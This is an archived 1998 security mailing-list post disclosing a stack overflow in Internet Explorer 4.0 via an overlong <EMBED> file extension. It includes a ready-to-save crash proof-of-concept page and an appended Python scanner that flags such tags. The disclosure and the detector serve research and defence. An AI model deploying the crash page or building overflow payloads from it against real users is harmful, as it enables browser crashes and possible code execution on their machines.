MSIE buffer overrun

From: Georgi Guninski (guninskiat_private)
Date: Fri Mar 20 1998 - 02:09:46 PST

    Microsoft Internet Explorer 4.0 (don't know for other versions)
    can be crashed and eventually made to execute arbitrary code
    with a little help from the <EMBED> tag.
    
    The following:
    <EMBED SRC=file://C|/A.ABOUT_200_CHARACTERS_HERE___________________>
    opens a dialog box and closes IE 4.0.
    It seems that the long file extension causes stack overrun.
    
    The stack is smashed - full with our values, EIP is also ours and CS=SS.
    So probably a string could be constructed, executing code at the
    client's machine.
    
    Solution: Do not browse hostile pages.
    To try this: http://www.geocities.com/ResearchTriangle/1711/msie.html
    
    
    Georgi Guninski
    http://www.geocities.com/ResearchTriangle/1711
    
    -----------------------cut here and save as crashmsie.html---------------------
    <HTML>
    Trying to crash IE 4.0
    <EMBED
    SRC=file://C|/A.012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789>
    <!-- column ruler for the SRC line above: 40 80 160 170 180 190 200 -->
    </HTML>
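    The pattern described in the post (an <EMBED> whose SRC ends in an
    extension a couple of hundred characters long) is easy to flag on the
    way in, which is the practical alternative to "do not browse hostile
    pages". The scanner below is an added example written for this archive
    page; it is not code from the original post or from Microsoft. It parses
    HTML with Python's standard html.parser, collects every EMBED SRC value,
    and reports those whose file extension exceeds a threshold. The
    threshold of 64 characters and the sample pages are constructed for the
    example; the long sample reproduces the shape of the post's string
    ("A." followed by 200 digits).

```python
"""Flag <EMBED SRC=...> values with suspiciously long file extensions.

Added example for the MSIE <EMBED> stack overrun post; not the original
post's code. Threshold and sample inputs are constructed for illustration.
"""
from html.parser import HTMLParser

# Constructed threshold: ordinary extensions are a handful of characters,
# while the post's crash string carries roughly 200.
MAX_EXTENSION_LEN = 64


class EmbedSrcCollector(HTMLParser):
    """Collect the SRC attribute of every <EMBED> start tag."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        # html.parser lowercases tag and attribute names; the value is
        # passed through as written, including unquoted file:// URLs.
        if tag == "embed":
            for name, value in attrs:
                if name == "src" and value is not None:
                    self.srcs.append(value)


def extension_of(src):
    """Return the file extension of a URL or path ('' if it has none)."""
    # Drop query string and fragment, then look at the last path segment.
    for sep in ("?", "#"):
        src = src.split(sep, 1)[0]
    name = src.replace("\\", "/").rsplit("/", 1)[-1]
    _stem, dot, ext = name.rpartition(".")
    return ext if dot else ""


def find_overlong_embeds(html, limit=MAX_EXTENSION_LEN):
    """Return [(src, extension_length)] for EMBED SRCs over the limit."""
    parser = EmbedSrcCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for src in parser.srcs:
        ext_len = len(extension_of(src))
        if ext_len > limit:
            findings.append((src, ext_len))
    return findings


# Constructed sample pages. The first mirrors the post's crash file: an
# unquoted file:// SRC whose extension is 200 digits long.
LONG_EXT = "0123456789" * 20
SUSPICIOUS_PAGE = (
    "<HTML>\nTrying to crash IE 4.0\n<EMBED\nSRC=file://C|/A." + LONG_EXT + ">\n</HTML>\n"
)
BENIGN_PAGE = '<HTML><EMBED SRC="movie.avi" WIDTH=320></HTML>'


if __name__ == "__main__":
    for label, page in (("suspicious", SUSPICIOUS_PAGE), ("benign", BENIGN_PAGE)):
        hits = find_overlong_embeds(page)
        print(f"{label}: {len(hits)} finding(s)")
        for src, ext_len in hits:
            print(f"  extension of {ext_len} chars in SRC starting {src[:24]!r}")
```

    Run the file as a script to see the constructed crash page flagged and
    the benign page pass. Because the check is on the extension length
    rather than the exact string, it catches variants of the same trigger;
    a content filter or proxy could apply the same test to pages before
    they reach an unpatched client.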
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:46:19 PDT